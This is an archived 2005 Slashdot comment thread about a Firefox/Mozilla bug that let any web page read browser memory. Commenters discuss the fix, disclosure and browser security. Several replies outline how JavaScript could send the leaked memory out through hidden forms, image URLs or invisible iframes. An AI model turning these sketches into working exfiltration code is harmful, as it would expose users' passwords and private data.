Mozilla / Firefox Memory Exposure Vulnerability

← Back to Stories (view on slashdot.org)

Mozilla / Firefox Memory Exposure Vulnerability

Posted by timothy on Monday April 4, 2005 @08:03AM from the mine-sure-is-vulnerable dept.

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

132 comments

Min score:

Reason:

Sort:

Did the Mozilla/Firefox guys ignore a warning? by astrashe · 2005-04-04 08:06 · Score: 3, Insightful

Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?
1. Re:Did the Mozilla/Firefox guys ignore a warning? by rogabean · 2005-04-04 08:08 · Score: 2, Interesting
  
  Excellent question.
  
  Just tested out the "proof test" myself. Amazing some of the stuff I still had in memory here ;)
  
  Followed by the browser shutting itself down after about 20 furious clicks on the link! :P
  
  --
  "why don't you just slip into something more comfortable...like a coma!"
2. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · 2005-04-04 08:14 · Score: 2, Informative
  
  According to bugzilla it's fixed on the trunk. The last comment for the bug associated with this vulnerability says:
  
  Fixed on trunk, AVIARY_1_0_1_20050124_BRANCH, and MOZILLA_1_7_BRANCH.
  
  Thanks for the report, I hope that's the last bug from 1997 left ;-).
  
  /be
3. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · 2005-04-04 08:16 · Score: 5, Informative
  
  From the bugzilla bug report (copy it, they disallow /. links):
  
  Opened: 2005-04-01 13:40 PDT
  Last modified: 2005-04-01 22:39 PDT
  Resolution: FIXED
  
  So yes they did, it was fixed in under 10 hours, and published 3 days later.
4. Re:Did the Mozilla/Firefox guys ignore a warning? by klui · 2005-04-04 08:20 · Score: 4, Interesting
  
  Comments seem to indicate that it's a very old bug...
  
  ------- Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------
  
  BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:
  
  r=norris,waldemar
  Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
  encode & decode routines.
  
  Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
  hunks of that revision:
  
  @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
  @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *
  
  that half-fixed the original 1997-era bug. /be
5. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · 2005-04-04 08:26 · Score: 1
  
  I would think that's proof that the Mozilla/Firefox guys did NOT ignore the warning... not proof that they did. I'm assuming you meant that.. it is Monday after all ;-)
6. Re:Did the Mozilla/Firefox guys ignore a warning? by TFGeditor · 2005-04-04 08:31 · Score: 1
  
  And we can get the patch where?
  
  --
  Ignorance is curable, stupid is forever.
7. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · 2005-04-04 08:41 · Score: 3, Informative
  
  You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.
8. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · 2005-04-04 10:27 · Score: 1
  
  Whoops. There's no right way about that. I was saying "yes they did" to the second part of the OP:
  
  "did this site publish the vulnerability without giving them a chance to patch?"
  
  But that's wrong too. I meant to say that yes they did inform the Moz devs of this before going public.
9. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · 2005-04-04 11:15 · Score: 2, Informative
  
  copy it, they disallow /. links
  
  Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.
10. Re:Did the Mozilla/Firefox guys ignore a warning? by passthecrackpipe · 2005-04-05 03:24 · Score: 0
  
  dude, that is very cool -- i did not know it did that
  
  --
  People who think they know everything are a great annoyance to those of us who do.
11. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · 2005-04-05 10:12 · Score: 1
  
  I forgot to say that you can also select a text and drag it there. Good for those links posted as plain text, or for quick FeelingLucky searches.
What? by Repiv · 2005-04-04 08:09 · Score: 0

All it does is crash Firefox.
1. Re:What? by Repiv · 2005-04-04 08:17 · Score: 0
  
  My bad, it did crash the first few times, but it worked the fifth time.
2. Re:What? by Dios · 2005-04-04 08:18 · Score: 1
  
  Same here. I click the link, Firefox crashes. What gives?
3. Re:What? by RS_ping · 2005-04-04 11:47 · Score: 1
  
  Since I upgraded to FF 1.02 my Windows keeps crashing.
  
  Wait, maybe it's not Firefox. Never mind!
  
  rsmith@pingdata.net
Confusing write-up by Smack · 2005-04-04 08:10 · Score: 3, Interesting

Can a remote site actually get access to this information, or is it only displayable on the screen?
1. Re:Confusing write-up by Vaevictis666 · 2005-04-04 08:12 · Score: 1
  
  It's available to javascript, which is fully capable of doing a browser redirect and sending the mem dump along as GET data.
2. Re:Confusing write-up by cjsnell · 2005-04-04 08:13 · Score: 5, Informative
  
  Can a remote site actually get access to this information, or is it only displayable on the screen?
  
  The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.
  
  Yes, this is very dangerous.
3. Re:Confusing write-up by jcuffe · 2005-04-04 08:13 · Score: 1
  
  Well it would seem that since the demonstration output the information it read into that textbox, it was able to read the information directly from memory. Then again, I'm not an expert, so although I'm quite positive, I can't say for sure.
4. Re:Confusing write-up by orangesquid · 2005-04-04 08:14 · Score: 2, Informative
  
  AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.
  
  --
  --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
5. Re:Confusing write-up by Kelerain · 2005-04-04 08:14 · Score: 2, Interesting
  
  If they can display it in a form like that, they could submit that information in a hidden form window on a stie where you typically expect to submit info (a login page for example). Javascript can talk to a website back end as well I think.
  
  Also from the article:
  "A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."
  
  So yeah, this is a bit more dangerous than the old load the root folder in an iframe trick.
6. Re:Confusing write-up by Sentry21 · 2005-04-04 08:18 · Score: 3, Interesting
  
  Javascript could access this, then send that information to a form via a GET request (URLencoded) to a script via a 1x1 pixel iframe hidden on the page, or even a display: hidden; iframe for that matter.
  
  I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.
  
  The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.
I'm shocked! by samael · 2005-04-04 08:13 · Score: 5, Interesting

I seem to recall that every time an IE bug appeared people would say that Mozilla was much more secure, and that it wasn't just that IE was targetted by hackers because of the popularity, but that the software was inherently more secure.

But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.

Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

--
My Journal
1. Re:I'm shocked! by orangesquid · 2005-04-04 08:16 · Score: 1
  
  It's getting used more than it used to---that's a big part of it.
  
  --
  --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
2. Re:I'm shocked! by jcuffe · 2005-04-04 08:18 · Score: 1
  
  Maybe the reason for this is the growing usage of Mozilla applications. One reason often given for the security of open source (and macs) is that more users use Microsoft etc. products, which makes them larger targets. Just my two cents.
3. Re:I'm shocked! by Anonymous Coward · 2005-04-04 08:22 · Score: 0
  
  The bug was fixed in under 10 hours. Not bad if you ask me.
4. Re:I'm shocked! by FidelCatsro · 2005-04-04 08:28 · Score: 2, Informative
  
  from the looks of it , these problems are not affecting the rest of the OS(as far as i can tell from the explination on secuna) i did a few tests and it is only reading the memory area from the browser , how far into the memory it can go i do not know (does it say ? the secuna advisory is shallow on details as ussual).
  Well unlike MSIE this is a bug rather than a feature(ActiveX) and all software has bugs but aparently it is patched so will be rolled out soon.
  Getting details on this is not the easyes but acording to the bug reports someone was saying the problem was perhaps in the browser for the last 8 years..
  ------ Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] ------- BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000: r=norris,waldemar Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI encode & decode routines. Unfortunately, AFAICT none of the bugs he cites had anything to do with the two hunks of that revision: @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData * @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData * that half-fixed the original 1997-era bug. /be
  
  --
  The only things certain in war are Propaganda and Death. You can never be sure which is which though
5. Re:I'm shocked! by ChipMonk · 2005-04-04 08:31 · Score: 2
  
  The possibility of identity theft is nothing to be careless about. However, Mozilla on Unix/Linux still has the advantage over IE on Windows, in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker. Desktop Windows pre-XP had no problem with anything a user did, up to and including deleting the C:\WINDOWS directory.
  
  So the original assertion is still, at least partly true: The software underneath the apps is more secure.
6. Re:I'm shocked! by samael · 2005-04-04 08:32 · Score: 2, Insightful
  
  Which is fair enough.
  
  Of course, I can reinstall the OS in about two hours.
  
  It's my documents I actually care about...
  
  --
  My Journal
7. Re:I'm shocked! by curbion · 2005-04-04 08:57 · Score: 1
  
  How in the hell is that flamebait , i think you have a Troll with mod points after you.. I shall sacrifice my karma(n00b karma no loss i can gain it back later) by being offtopic and insulting the mod here . I was reading over the bug report myself and came across the same thing , so if anyone could expand on if this is true and has it been around for 8 years then please do tell us. Bad moderation , really bad. Fidel Welcome to my freind list
  
  --
  Im a robot your a robot , That however is a row-boat
8. Re:I'm shocked! by Gary+Destruction · 2005-04-04 09:00 · Score: 1, Insightful
  
  Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0. Microsoft has billions of dollars and more than enough developers and other personnel to make a secure product. Mozilla may have more security flaws in the short run, but it will have less in the long run because more careful consideration was made during development.
9. Re:I'm shocked! by NanoGator · 2005-04-04 09:07 · Score: 3, Informative
  
  "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"
  
  It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.
  
  (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)
  
  (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)
  
  --
  "Derp de derp."
10. Re:I'm shocked! by dougmc · 2005-04-04 09:12 · Score: 1
  
  in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker
  To be fair, a good bug in Mozilla can take your X server down, or at least make it so unresponsive that you can't do anything. Or it could kill your window manager, probably logging you out. And if things do get really stuck, you may have to log in from another system (or hit the vulcan nerve pinch keys -- either kill X, get to a VC and maybe C-A-D.)
  Not quite as bad as taking the entire system down, but still annoying when it happens.
11. Re:I'm shocked! by samael · 2005-04-04 09:14 · Score: 1
  
  Mozilla is based on code going back a very long time.
  
  And if it's younger then it's had less time to have horrible crustiness develop.
  
  Either way round isn't an excuse.
  
  --
  My Journal
12. Re:I'm shocked! by dougmc · 2005-04-04 09:15 · Score: 2, Insightful
  
  Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.
  And Linux is at version 2.6.something, and Windows is at version 2003 and Solaris is at version 10 (having jumped from 2.6 to 7.) Fedora Core is at FC3 (or is that RH12?) Doom is up to Doom 3, and Jake 2.0 was released at 2.0 and never made 2.1. And I think Sid died at version 6.7. Relevance?
  Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products like you appear to be doing, at least not in any meaningful way.
13. Re:I'm shocked! by samael · 2005-04-04 09:26 · Score: 1
  
  I sincerely agree with disclaimer 2 - I _wasn't_ saying Mozilla was worse, or as bad. I was merely pointing out the dysjunction between what I'd been told and what I was seeing and asking whether I was seeing things...
  
  --
  My Journal
14. Re:I'm shocked! by Gary+Destruction · 2005-04-04 09:38 · Score: 1
  
  Who has more developers and resources: Mozilla or Microsoft?
15. Re:I'm shocked! by samael · 2005-04-04 09:42 · Score: 1
  
  Aaaah, so you're saying that Microsoft is always going to produce software then?
  
  --
  My Journal
16. Re:I'm shocked! by Gary+Destruction · 2005-04-04 09:43 · Score: 1
  
  Are you implying that version numbers are qualitative?
17. Re:I'm shocked! by Anonymous Coward · 2005-04-04 09:53 · Score: 1, Insightful
  
  Are you implying that version numbers are qualitative?
  No, he was mocking someone else who did:
  Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.
18. Re:I'm shocked! by HardJeans · 2005-04-04 12:32 · Score: 0
  
  It also appears every IE security flaw/exploit is frontpage /. news. So why isn't this a frontpage story?
  
  --
  "I'm not talking to myself, I'm just the only one who's listening." - Jimmies Chicken Shack
19. Re:I'm shocked! by civilizedINTENSITY · 2005-04-04 15:34 · Score: 1
  
  You can reinstall the OS in about two hours, sure. If you know you've been owned. So, then, do you reinstall every day? Every 12 hours? If you care about your documents, does it matter being owned? I think so.
20. Re:I'm shocked! by Ogerman · 2005-04-04 20:07 · Score: 4, Interesting
  
  Is Mozilla actually more secure? Or is it just as bad as any other piece of software?
  
  In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?
  
  What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.
21. Re:I'm shocked! by orasio · 2005-04-05 01:39 · Score: 1
  
  Two hours doing something you didn't want to do is a lot of time.
  Two hours when you have a deadline is a lot of money.
  Two hours in the workplace would not be acceptable.
  
  Plus, you would need to know your system has been compromised in the first place, and then reinstall the same unsecure software.
  
  With mozilla, you could wait 8 more hours, and install a patched version of your software.
22. Re:I'm shocked! by orasio · 2005-04-05 01:47 · Score: 1
  
  IE bugs are a real problem because you can't hide from it.
  If mozilla has some critic bug, you can always disable mozilla and use konqueror until mozilla releases a fix. That would be a day or two without mozilla.
  In an IE-scenario, you would not be able to disable IE, plus there's no reasonable amount of time after which you can expect a bug will be fixed.
  Noone is talking about bug-free software. Bug-free software is just not worth it, it would take too muuch time and money to be useful.
  
  The thing with IE is that most people can't trust Microsoft to fix IE issues fast enough.
  
  Security issues, although all of them can be critical, cannot be measured just as "amount of critical issues made public". If you factor in at least the severity of the issue * time for a patch, the numbers are very different between mozilla* and IE.
  
  Maybe they are promising a more secure IE in the future, but there's just no need for it. It's difficult to regain trust in something that has failed your objectives so miserabily in the past.
23. Re:I'm shocked! by orasio · 2005-04-05 02:03 · Score: 1
  
  MS programmers come from who-knows-where, and noone can see their code to see if it's good.
  MS feature list comes from marketing dept. Its release deadlines, from marketing dept + the reality. If reality-based delays don't meet marketing expectations, we don't know what they do.
  
  Mozilla developers can be put to test, because we can read their code, there is even people who do read their code. If you got any conclusions on the mozilla developers skill, you couldn't extrapolate them to MS developers, because you can't see their code.
  Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add.
  Their release schedule are firmly based on reality, coders and maintainers. They release when it's ready, basically. The way they use to meet a self-imposed deadline is basically to keep new features out.
  
  They are very different pieces of software, and we could measure the quaility of mozilla software, but we cannot do the same with IE, other than on the surface. We could measure the quaility of the mozilla development process, and we can't do the same with IE.
  
  What I believe is that it can be argued if mozilla is good software or not, and to an extent, setting some framework, it can be proved. The same can't be done about MS software.
  
  So, what I mean is that there can be other reasons than just personal like or dislike to talk about quality between MS software. Just because microsoft software quality is unknow it doesn't mean that it is equal to mozilla software quality. At least mozilla software quality is measurable, that alone _does_ make it better.
24. Re:I'm shocked! by NanoGator · 2005-04-05 03:47 · Score: 1
  
  "MS programmers come from who-knows-where,"
  
  And Open Source programmers come from the good programmers cabbage patch or something?
  
  " there is even people who do read their code."
  
  If they feel like it. Sadly, errors and half-assed functionality still get through.
  
  "Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add."
  
  Whatever they feel like adding. (Or, more appropriately, copying from another app.)
  
  "So, what I mean is that there can be other reasons than just personal like or dislike to talk about quality between MS software."
  
  Maybe. However, Mozilla (nor Open Source, really) is perfect, and shit still happens. It doesn't matter if you're using something make by Microsoft or by the community, there are downsides to it. Frankly, since I'm so sick of both extremes of it, I've settled on Opera. They're for profit. That means they get problems fixed. That also means they stay innovative to compete. I have a better browsing experience as a result of it.
  
  --
  "Derp de derp."
25. Re:I'm shocked! by orasio · 2005-04-05 07:23 · Score: 1
  
  Opera suxx : )
  
  I believe you are not quoting right.
  The OP stated that there is some amount of error inherent to software development, and that MS developers were supposed to be assumed to have the same quality as mozilla developers.
  
  What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important.
  
  What I exactly meant is that it does matter what you are using, because you can make an more informed decision about whether you use or not mozilla, and it has a record way better than IE, by any sensible measure.
  
  What you say about a company being for profit, and the fact that they should fix issues faster goeas against the fact that vulnerability fixes are available faster for software developed by free charge software.
26. Re:I'm shocked! by NanoGator · 2005-04-05 08:02 · Score: 1
  
  "Opera suxx : )"
  
  Actually, from the end-user point of view, Opera's probably the best one out there. Depends on how you view it, though. :)
  
  "What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important."
  
  I'm not sure I agree with that, but I don't think I can strongly dispute it either. Frankly, I'm not impressed with OSS software. I mean, some of it I am. A lot of it, I'm not. My idea of quality is that features work. I'll give you an example: A few months ago my gf reformatted her computer. She installed FireFox. (or was it Mozilla? I can't remember.) She absent-mindedly tried to import her IE bookmarks. (Absent-minded because it was a fresh install. No bookmarks to import.) FireFox crashed. It crashed every single time she tried it until she created a bookmark from IE. Quality, to me, says they would have written that feature with the idea that it coudl be run without the required data. Error checking.
  
  I have no doubt that in general OSS software has better development practices, but they really fall flat on their face when the programmers overlook UI features.
  
  Again, I think we're measuring two differnet sides of the equation, so please don't feel like I'm trying to poo-poo your point into the ground.
  
  "What you say about a company being for profit, and the fact that they should fix issues faster goeas against the fact that vulnerability fixes are available faster for software developed by free charge software."
  
  Perhaps. In some cases that is true, in some cases it isn't. It depends on how critical the problem is. There are a lot of problems with FireFox/Mozilla, for example, that have been problems for years. Microsoft's not immune to this, but it really does depend on what the programmer is interested in working on.
  
  As for as innovation goes, OSS has a lousy habit of being a cheap carbon copy of whatever it is they're imitating. (GIMP, uck.) For once, I'd like to see OSS develop in an innovative way.
  
  --
  "Derp de derp."
27. Re:I'm shocked! by orasio · 2005-04-05 08:19 · Score: 1
  
  Ok, again.
  Opera, I used to like.
  Now I don't use windows anymore, and I choose not to use non-free software, for ethical rather than technical reasons. That doesn't mean I don't care about features. I even run some non-free software when I just need to, to get my work done.
  
  What happens to me with Opera is that it was great, tabs were really great. Now Firefox is just smoother to me. I am a usability freak, too. It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I like, for example, its handling of dialogs, explanation of actions and defaults.
  
  When you talk about innovation... well, what innovation are you talking about? lots of free software (not just OSS software) is way ahead of what is available in proprietary software.
  Of course, mainstream free software or OSS is just... mainstream. The most popular pieces of OSS are the replacements to what propriteary software makes.
  As a counter-example, you have cinepaint, developed from gaim, that implements lots of useful stuff for movie making. There, gaim started as a copy (I never learned effective photoshop, but I can use gaim) of photoshop, and it helped develop something that wasn't available to the general public.
  
  Another big example of free software innovation, is archy, a different way to do things, that was originally proposed in a book by Jef Raskin, and is developed in the open, without the support of any big software company, at least until now. I believe it doesn't get more innovative than this (http://www.raskincenter.org/index2.html#whatisarc hy).
28. Re:I'm shocked! by Gary+Destruction · 2005-04-05 14:39 · Score: 1
  
  So what are you saying? They're quantitive? If that's true, then his argument has no basis.
29. Re:I'm shocked! by Gary+Destruction · 2005-04-05 14:41 · Score: 1
  
  I didn't think that they were qualitative. I thought that they were quantitive. You do know what those two words mean, don't you? Obviously the person that modded you up is a fucking moron just like you. You don't even have the fucking balls to post a name you fucking pussy.
30. Re:I'm shocked! by Gary+Destruction · 2005-04-05 14:55 · Score: 1
  
  Here's the definition of qualitative http://dictionary.reference.com/search?q=qualitati ve
  
  Here's the definition of quantitive http://dictionary.reference.com/search?q=quantitiv e
  I hope this doesn't exceed your fourth grade reading level.
31. Re:I'm shocked! by NanoGator · 2005-04-05 15:48 · Score: 1
  
  "It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I like, for example, its handling of dialogs, explanation of actions and defaults."
  
  To each is own. Me personally, I enjoy all the little things they did to make browsing easier. Magnifying glass, 'paste and go' in the address bar, the notes panel, the mail client that is brilliant for handling forum email, etc. Whenever I use FireFox, I end up looking for buttons that aren't there.
  
  "When you talk about innovation... well, what innovation are you talking about? lots of free software (not just OSS software) is way ahead of what is available in proprietary software."
  
  I have a feeling we'll never totally agree on this just on the grounds of different experience. FireFox comes to mind, it has a lot of features that popped up well after Opera produced them. The GIMP further comes to mind, it's quite painful to use if you're a Photoshop user. Linux is quite the technological triumph, but the UI always feels a generation or two behind Windows. Thunderbird's not bad, but it's not Outlook either. (Granted, I don't think Outlook was its goal so maybe that isn't fair. I have to say, though, I tossed it after getting tired of finding bugs.) (Note: I'm talking about Outlook 2000, not Outlook Express. It's like comparing Word to Wordpad.)
  
  Again, I'm not sure we'll agree, so please don't feel too defensive. My experiences with OSS have almost always made me feel it is perpetually behind its proprietary counterparts. If you have a different experience, I can't really argue with it, nor would I try to.
  
  Cheers.
  
  --
  "Derp de derp."
32. Re:I'm shocked! by Anonymous Coward · 2005-04-10 02:36 · Score: 0
  
  "Who has more developers and resources: Mozilla or Microsoft?"
  
  Er, I thought the strength of open source was loads of eyeballs on the code? Ooops, eh?
  
  You can't fudge your way out of it: Firefox has security problems, just like IE, and there's a lot of messy and half-assed code in there. I love it, but to blindly assume it's better code all-round is just crazy.
oh man by Anonymous Coward · 2005-04-04 08:13 · Score: 2, Funny

all those l33t hackers will be able to see all my pr0n!
Interesting by L.+VeGas · 2005-04-04 08:18 · Score: 1

Crashed firefox when I tried it.

--
Best Windows Freeware
1. Re:Interesting by Matthew+Bafford · 2005-04-04 08:21 · Score: 1
  
  Same with my version (1.0.2).
2. Re:Interesting by Matthew+Bafford · 2005-04-04 08:25 · Score: 1
  
  Didn't crash the second time (with a fairly new session).
3. Re:Interesting by Kelerain · 2005-04-04 09:01 · Score: 1
  
  Its grabbing random memory garbage, right? So it stands to reason that some certain pattern or amount of memory displayed is causing a crash bug. perhaps there is some html in there that is confusing the engine, or some other random garbage string. I didn't hit a crash myself in a few clicks, but It would also depend on what sorts of things you have been doing.
4. Re:Interesting by fgl · 2005-04-09 09:14 · Score: 1
  
  Thats the auto defense system that was secretly installed in Firefox. Where the idea was stolen from we will leave as an exercise for the reader.
  
  --
  Go Away! Not for Sale
They say that open source... by Anonymous Coward · 2005-04-04 08:19 · Score: 1, Insightful

...is faster at fixing serious security flaws than closed source. Now this here is a fairly nasty vulnerability; not as bad as remote code execution, certainly, but still something I'd want fixed on my mum's PC as quickly as possible. So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this vulnerability - not just patch it in the nightlies, as that is trivial - but include it in an automatic update, like Microsoft would? I'm betting on weeks or months (not flame-baiting here, but so far most Firefox fixes have trickled down very slowly.) It will be interesting to watch and see.
1. Re:They say that open source... by n1ywb · 2005-04-04 08:24 · Score: 1
  
  I'm guessing you'll see a patch within 24 hours. *Fingers crossed*
  
  --
  -73, de n1ywb
  www.n1ywb.com
2. Re:They say that open source... by DJayC · 2005-04-04 08:29 · Score: 1
  
  Just get a nightly if you don't want to wait. It's fixed on the trunk since April 1st.
  
  Here's a link
3. Re:They say that open source... by ssj_195 · 2005-04-04 08:30 · Score: 1
  
  I'm hoping so. Despite the slightly challenging tone of my post, I'm genuinely rooting for them, but so far I can think of only one automatic update that wasn't one of the minor point releases (can't think of the exact term; you know, 1.0.0, 1.0.1, 1.0.2), and these have been spread far apart indeed :(
4. Re:They say that open source... by node+3 · 2005-04-04 13:42 · Score: 1
  
  is faster at fixing serious security flaws than closed source
  
  Considering this whole is already fixed, it's hard to ask for faster than that!
  
  On the other hand...
  
  So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this
  
  That's another question altogether, and one that isn't done so well with Firefox. Still far better than with IE (where you see actively exploited vulnerabilities listed on MS's IE page that aren't fixed for months!). This is something the Mozilla folks need to work on, but being a major open source project, it's more likely to be worked out than closed source projects are (which is the subject of your post).
5. Re:They say that open source... by fluffy99 · 2005-04-04 16:16 · Score: 1
  
  Great! I just installed the nightly build and it killed all of my extensions. I want my adblock back and flash blocker back (whimper). The extensions dialog box also locks up.
6. Re:They say that open source... by fluffy99 · 2005-04-04 16:40 · Score: 1
  
  Ok, I'm back. I reinstalled 1.0.2 and Firefox would start but none of the menus worked. I had to delete my profile directory, let Firefox recreated them, and copy my cookies and bookmarks files back in. Had to reinstall all the extensions too.
  
  Gotta love that open source software stability! You can bet I won't be trying any nightly builds anytime soon.
7. Re:They say that open source... by Narchie+Troll · 2005-04-04 18:31 · Score: 1
  
  Well, yes. Nightlies are unstable. That's the very nature of them.
  
  It has nothing to do with open source or any other methodology -- nightly builds are expected to break things.
8. Re:They say that open source... by fluffy99 · 2005-04-05 01:46 · Score: 1
  
  I expect some problems with a developmental build. I was surprised by the fact that it barely worked, took forever to come up, and ate 60-meg of ram when it finally did. Even worse, I practically had to castrate the program to be able to backtrack to the stable version. I'm just hoping the developers fix all these problems before rolling up the changes and calling it stable.
  
  I still prefer Firefox as I think it's safer than IE. Not completely safe, though. I certainly don't feel it's stable given all the problems I've had with the regular releases (for example flash on pages crashing the browser, wierd crashes, etc). Nevermind the crap they called a nightly build. I'm still up in the air on security too
9. Re:They say that open source... by Narchie+Troll · 2005-04-05 07:27 · Score: 1
  
  Nightly builds are automated. They're not even guaranteed to work. A daily snapshot of a constantly developing project may very well catch a transitional stage where everything's fucked up.
It looks like it requires Javascript by wowbagger · 2005-04-04 08:20 · Score: 2, Interesting

It looks like, in order to make use of this flaw, the attacker must get the victim to run Javascript.

Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".

I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask be before allowing any cookies to be set on my browser.

If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cooking on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.

Cookies are fine for sites which require log-in (e.g. /.). Javascript is fine for sites that need to do some client side processing (e.g. order entry sites which use JS to compute the order amounts to avoid a round-trip to the server). Flash is fine for some applications.

But please don't over use them.

--
www.eFax.com are spammers
1. Re:It looks like it requires Javascript by ChipMonk · 2005-04-04 08:27 · Score: 2, Informative
  
  Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.
2. Re:It looks like it requires Javascript by Dachannien · 2005-04-04 10:09 · Score: 1
  
  Flash is fine for some applications.
  
  I have yet to see a web application in Flash that couldn't be implemented in plain HTML with maybe a touch of server-side scripting. So-called Flash "movies" don't count, because those could simply be saved to disk via web browser without involving a plugin, and then could be played back without any online component at all.
  
  Of greatest annoyance are websites with Flash intros lacking a way to get past the intro, or with Flash navigation instead of a simple imagemap. Not everything on the web has to beep, spin, blink, or interact with the user - in fact, it's best if nothing does.
3. Re:It looks like it requires Javascript by FireFury03 · 2005-04-04 20:50 · Score: 1
  
  I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window
  
  Opening a new window has been depricated in XHTML - the only way to do it is JavaShit. Which is good because I hate webmasters assuming I want links opened in a new window (I almost never do - if I did I would've clicked "open in new window"). Unfortunately it's bad coz they'll just use Javascript instead. :(
  
  --
  http://blog.nexusuk.org
Vuln details by Anonymous Coward · 2005-04-04 08:21 · Score: 0

https://bugzilla.mozilla.org/show_bug.cgi?id=28868 8

Apparently this was a bug reported on previously and patched 4/1/05. Not sure it was a really very generous of Secunia to release an exploit so soon.
Wouldn't it have been better to give mozilla/firefox a chance to release a new version?
Definately a big hole by RzUpAnmsCwrds · 2005-04-04 08:27 · Score: 4, Insightful

This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.

If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.

Time for Firefox 1.03.
1. Re:Definately a big hole by Mercury2k · 2005-04-04 14:47 · Score: 1
  
  And you were dumb enough to click the link giving the admin of that web server permenant logs of your computers ram contents? Now we just have to hope that the ram contents of the 100000 or so /. people who clicked that link dont get comprimised and used for a botnet.
2. Re:Definately a big hole by RzUpAnmsCwrds · 2005-04-04 15:19 · Score: 1
  
  " And you were dumb enough to click the link giving the admin of that web server permenant logs of your computers ram contents? Now we just have to hope that the"
  
  And you were dumb enough to assume that I didn't check the source code before clicking the button. No data is transmitted with this example.
  
  Of course, other websites may not be so forgiving.
